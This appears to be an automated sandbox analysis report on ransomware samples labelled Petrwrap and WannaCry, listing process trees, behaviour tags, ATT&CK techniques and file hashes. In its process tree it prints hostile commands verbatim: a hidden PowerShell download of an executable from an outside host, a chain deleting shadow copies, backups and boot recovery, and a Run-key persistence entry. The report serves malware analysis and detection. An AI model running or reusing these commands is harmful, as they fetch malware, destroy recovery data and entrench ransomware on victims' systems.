    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5448 /prefetch:1
    PID: 3760

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1
    PID: 4168

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:1
    PID: 3964

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2672 /prefetch:1
    PID: 4956

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5504 /prefetch:8
    - NTFS ADS
    - Suspicious behavior: EnumeratesProcesses
    PID: 5040

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1712 /prefetch:2
    - Suspicious behavior: EnumeratesProcesses
    PID: 4228

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4820 /prefetch:1
    PID: 4844

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5088 /prefetch:8
    - NTFS ADS
    - Suspicious behavior: EnumeratesProcesses
    PID: 1756

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:1
    PID: 3044

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5276 /prefetch:8
    - NTFS ADS
    - Suspicious behavior: EnumeratesProcesses
    PID: 3020

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5712 /prefetch:1
    PID: 1812

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5412 /prefetch:1
    PID: 652

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3904 /prefetch:8
    - NTFS ADS
    - Suspicious behavior: EnumeratesProcesses
    PID: 4896

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6408 /prefetch:1
    PID: 4648

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6608 /prefetch:8
    - NTFS ADS
    - Suspicious behavior: EnumeratesProcesses
    PID: 1992

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2616 /prefetch:1
    PID: 3060

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4944 /prefetch:8
    - NTFS ADS
    - Suspicious behavior: EnumeratesProcesses
    PID: 4224

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6472 /prefetch:1
    PID: 4584

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2636 /prefetch:8
    - NTFS ADS
    - Suspicious behavior: EnumeratesProcesses
    PID: 4344

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
    PID: 5036

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6484 /prefetch:8
    - NTFS ADS
    - Suspicious behavior: EnumeratesProcesses
    PID: 1772

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4068 /prefetch:1
    PID: 740

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6332 /prefetch:8
    - NTFS ADS
    - Suspicious behavior: EnumeratesProcesses
    PID: 1236

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6676 /prefetch:1
    PID: 3832

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6724 /prefetch:8
    - NTFS ADS
    - Suspicious behavior: EnumeratesProcesses
    PID: 3668
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1236
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4660
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:2844
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.Petrwrap.zip\myguy.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵PID:2260
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://french-cooking.com/myguy.exe', 'C:\Users\Admin\AppData\Roaming\50121.exe');2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2924
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.Petrwrap.zip\svchost.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.Petrwrap.zip\svchost.exe"1⤵
- Drops startup file
- Drops desktop.ini file(s)
- Drops file in Windows directory
- NTFS ADS
- Suspicious use of AdjustPrivilegeToken
PID:3124
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"1⤵
- Drops startup file
- Sets desktop wallpaper using registry
PID:4616 -
C:\Windows\SysWOW64\attrib.exeattrib +h .2⤵
- Views/modifies file attributes
PID:1516 -
C:\Windows\SysWOW64\icacls.exeicacls . /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:840 -
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:1588 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 18081715288081.bat2⤵PID:4044
-
C:\Windows\SysWOW64\cscript.execscript.exe //nologo m.vbs3⤵PID:3160
-
C:\Windows\SysWOW64\attrib.exeattrib +h +s F:\$RECYCLE2⤵
- Views/modifies file attributes
PID:3424 -
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]PID:664
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exeTaskData\Tor\taskhsvc.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:3492 -
C:\Windows\SysWOW64\cmd.exePID:2696
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]PID:2436
-
C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet4⤵PID:3104
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1516 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2436 -s 2804⤵
- Program crash
PID:2388 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2436 -s 2804⤵
- Program crash
PID:3884 -
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:2732 -
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4556 -
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]2⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3288 -
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "czxlscessk897" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\tasksche.exe\"" /f2⤵PID:928
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "czxlscessk897" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\tasksche.exe\"" /f3⤵
- Adds Run key to start application
- Modifies registry key
PID:2444 -
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:1756 -
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4632 -
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]PID:2812
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1412 -
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]PID:2388
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:1980 -
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4940 -
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]PID:2116
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:3680 -
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4620 -
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]PID:2528
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:4520 -
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2088 -
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]PID:3392
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:4228
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 2436 -ip 24361⤵PID:3684
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1052
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2436 -ip 24361⤵PID:1236
Network
MITRE ATT&CK Enterprise v15
Execution
- Command and Scripting Interpreter (1)
- PowerShell (1)
- Windows Management Instrumentation (1)
Privilege Escalation
- Boot or Logon Autostart Execution (1)
- Registry Run Keys / Startup Folder (1)
Downloads
-
C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\@[email protected]Filesize
1KB
MD51e7817dbd0fc1bf032fd8fbde62293f6
SHA18f0dabdaf450914405123ccbbe211504de0088e7
SHA256c31b653b409ff31d21efa8cb94df3f7461356827f5e1daa58f6f71881daa02fd
SHA51228dd3988f3bd02626296377041feb6169f7c3fff9f5ff7d7873bee78877b66e229908dcd28b61918a64564be7113af95c2c73ff59cd86b3d6ba1b5ee4ebba851
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD55e027def9b55f3d49cde9fb82beba238
SHA164baabd8454c210162cbc3a90d6a2daaf87d856a
SHA2569816e980b04f1fe7efaa4b9c83ff6a0fdd485ee65a884c001b43a0cad7c39d83
SHA512a315e1336c5ec70cbb002969e539068ba92f3ec681b6d863db95227fd1808a778fd994e2fb03f28f0e401677aa5f7c66813e315b6b99a5065384c49586f9782e
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD50c5042350ee7871ccbfdc856bde96f3f
SHA190222f176bc96ec17d1bdad2d31bc994c000900c
SHA256b8b1cb139d4d19a85adce0152fa3c4f6adfb73a322d7253820e848c6f82afc1b
SHA5122efdb535fa6a06c4f9702b2129f2dd07c330e37fd10b492f2236007c660c1707773c22005d1e1fa580dbf633dc1a700ada3b7b611ef9accd9555a17a244f61ce
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
1KB
MD54a4957cccc122d3016fb60f11a4b593b
SHA1a1f39d181458837dd49a964bd601bf04b62ae6b5
SHA256e0c8162c0f57c6493905cc82d595d10f5f06bc919506c629965ac881b2fec055
SHA512e0524fa37ae6de092dab377f83ae5fd4903bbf752c08e8e04902007224cd6fb9bd96f55a0f480c321b312561e0a0f2898e21a1a719401fadbd438efdfe5d95f4
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent StateFilesize
579B
MD5a7d1701142cca705f833d70023ef4e1e
SHA11b76853132abfcddb4fefac42bf9df5d013c9815
SHA2566c92f51e7f056e73c407228fc280cb7ca4d00ab02674d1dda4eafd7dc9f070f7
SHA512806b7ccb375cc6116e64a9fa15229d783615d13b54cf40251561d9b664f0925915c5375ad88f5ca8d061e01367de239c29da79adf693559af53eeb7d9b1ba1a0
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
5KB
MD593261bf55b54bf91c62c3d35378da082
SHA177d60cf98c913bde326aa03e419ccb37cb63cd6d
SHA2561fe4a93041e028913614bd9c91bded1c7402403b4f48cf48f32cbcc37280bbbe
SHA512567af39691376acdf3d607cb4446e161b7d0c6a1f0af532890cd153d5eee68881835fe16bf15a09e3acfe2d89ba43d1b2b5785c208853037e47fce39b4e72894
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD5553adb0ed7bb2fce3741925d2f924852
SHA1807288bc57b8405313890571a5fb6073517a793e
SHA2560e6dd2fbe28c2a593ade6fa79da292a16b4864a9a2831c0c09387f02ae2e1b47
SHA512443a7bbaea6106735bda272a203c5d28feb188b2d0ce5a4088d59feb59589a30db8b895a824f0f9fda92b7f0e8200d019281fdf6bb2dd6fcd0541c96a1ead2c3
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD59447164e04b948a117d914a392d2fc92
SHA1e3e5156c23b00d7b6940eff4e3a3c06235cf5ada
SHA256678ee98617d8157785d31a14a4b288df6b7d28b34aa1174336293e449dcf74f5
SHA5129ed0af8065b16aed540b987efbdb4cc9845f4ad7ca0ffcc1e505e0717a8c7704f4c7eafaadad6c1efd49a8607cc95130d27bd567864294789a27a5715f9594f3
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD5afd65a322765ad847da7f5ad8c273c7f
SHA1f2c62f8e5446260df36112e6187a66ecd178c1ad
SHA25652a66f8d2ed89f6df7f7f21d366e2fa11bfe8eb34f31a9103da9a01f6033c096
SHA512e596a28a57ee18456324ccc13f7849a44ed7c2fb7388dee899e3f9f0b01e28158d10beb1a922d29ccc9744e4bf66b629fa0d7228e48a829f6aeafb3d0a9f4c09
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD57b2fa8dddeaf24b2324278435a014c67
SHA105627392a3d98b50863be014c481c080cd8ab681
SHA25648c7ceaaf3f10fb088c759260147e3c9bf0945472e8a7386ab192f50b41b97a8
SHA5120513fe5d1476865df2c18b73e182e439c451dfbb80d05aedad7c3289da17be7aff7e1eb3791602c7d468fbde5d7efb718bf27dd64658947d3db8b8b6bedd3905
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurityFilesize
1KB
MD572c72651edc3d3752f758b1f2f17fddf
SHA1660fcba0c731a59638f1298d2ec09074bea49fd2
SHA2566492c096b34cc2c357fef7dbea782a1187b1ce83694ab7e84ecd904c744b5050
SHA512b84d289975f75c9be9ee68329659582d7ccc733ac733b641e25b417cb4dfb45cadc3d8156bcf123c537e16fda653c2f4bf3c1087fae1d4a822d638bf4ece4f6f
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurityFilesize
1KB
MD5e4961e6f7f0c804010b5d8360211dce0
SHA15cd4b496b86e9ecf11cdddb1fa4a68c042bc9063
SHA256d197578b1e913307724872321c2f72c0ef3eb78373400222e3e0e7b0a820cb1f
SHA5127c0addafca0924f5f62d7e5e6dd6ef723cec47d6eca3862271454c21588afa6a0ea0ee10dcf4980fd0bf6653856a2a6d75977c76b231d14f0b006bb21b73ef7f
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurityFilesize
1KB
MD5d75a88c8c99a454d55f8281e2e105a8e
SHA1f8eadb0e5658fee9f853abd8fdc433207ca8fd42
SHA256060deceee5b0935867fccfeb1f3276943c764f21bce0c0cffa8c1d58decd6778
SHA512d0017bcf0b88e690e87b55e3df89ebdddf94423a1a2398d52363e0bd39e72b32068d96e192acd2b19dece846e3b50cc32dd3d9c323b8f7348f423607a36fe9aa
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurityFilesize
1KB
MD50188eee9db4912c9c40f1ffb62ab255d
SHA1dd4b97d115d2c16badeb29ffafcc9bc3fb175a31
SHA256c6ae1e141bd557efb8f667eb0cf87db2d8f5c01008e8d5146e0503bdf0182863
SHA5125027d3aecc0d26784e198a4f64b5811976936e728890b74f7d25dedfe36b44fe4c6af896add3cd9bb8e6ca2211724affd11db94504a40bf11f0512cb1abc828d
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurityFilesize
874B
MD51eed2daf0a58be4135f742b2f7f06719
SHA1565f47bf66b828f0e9053e926e0d07d6b9cb1dd3
SHA2561373386ac3f55e51a48aec460404fdf973b154ef1476e9b1409cb8df00a5ed9f
SHA51274a4ddc433cc04ac52ca6b9fac6e05458f925e6523a06ec820408e2e89f7f813c3452801f120ae4e0d86cdaa904d6eff98a269611e321434f2377bd27c451b84
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurityFilesize
1KB
MD51d86cbf65661819c8827ecc0d9d4f8da
SHA1bb0da835eb5f33763d00247eab9dbbcf7cc9c5e7
SHA2567386cfca423c70689232aa5af27bf3a78f914381a0cb9386a9818a89dbd59e7c
SHA512b2d1e30cddfcc149b4ad13689355add4c5c61f07922f096c05fd2a17d45b8b8b69bdfe091127c5bf4a3a989b17d8f81cef7ae253ba1c88f4c627f7ceacf90efc
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurityFilesize
1KB
MD5940c59ceaef6b9c3792b55c5e642e206
SHA11a07a31bbc1d7db1f9ce7a30b41c28c3be17d475
SHA256f7077885001f643823dfba31cdf1fbf6be1db73978c2c33134363ff7258c78c3
SHA51221e734af52c0ae74e8dc824a3a10b52a3ca4ec13dfda15f4149c8ae878e1a1fe6c30ed03cfe4ae52718621f3a8a4ec02deeb3eb72c4a24f9f46c0c41a48f669b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurityFilesize
1KB
MD5d233bed879e6860be07045bba794646e
SHA152876c33a4e40f60c461aacc0a3121593c07198b
SHA2562be7d3f5c2b677819f35c76f21f9e503278ec6dce402a51140f3c03f2daada4b
SHA512427c2f080028f0a927ac00d3fd499193fe935f49070289b5dd1631e13ec50ff8e09b9e9483b85d9377c89a07d95a81acc23fe956ba8d409da19c4d5f91d4255c
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurityFilesize
1KB
MD518b8061c99a0baa2e9d3b2d64be14625
SHA139f1cac37048e929489f55e4dbfeff2ed54ab0aa
SHA25638635c6b56904bea536c82cdd99fdc1670dc1658ad328ce001bdd9a2c75d9c63
SHA5127cbbaec29326bc12572bf7bfa457424b3fc4d580dec299d7b2e65ea73558746f51def8ae4bf69e96ca1e545253ec29770eb40d338a1bcc3f3f197fd0a0342645
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurityFilesize
1KB
MD562faed9edff9af66b995a86322aac17d
SHA15f74b20041647d394d74334aec9dc92f90c303e7
SHA256f534e5ab5865eeb5dba78f2ab989df9f6722b28e2bc94927cfa72fbcd1646ba0
SHA51249272fc9469b64213f3cca3abf72e3bb3d62d4bcbef3ae11774a9a9927ba7dcb06344872d615ee726ac43b221d8c9b65d7fe6a749ffb06d2a4e20d8ad2e52672
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurityFilesize
1KB
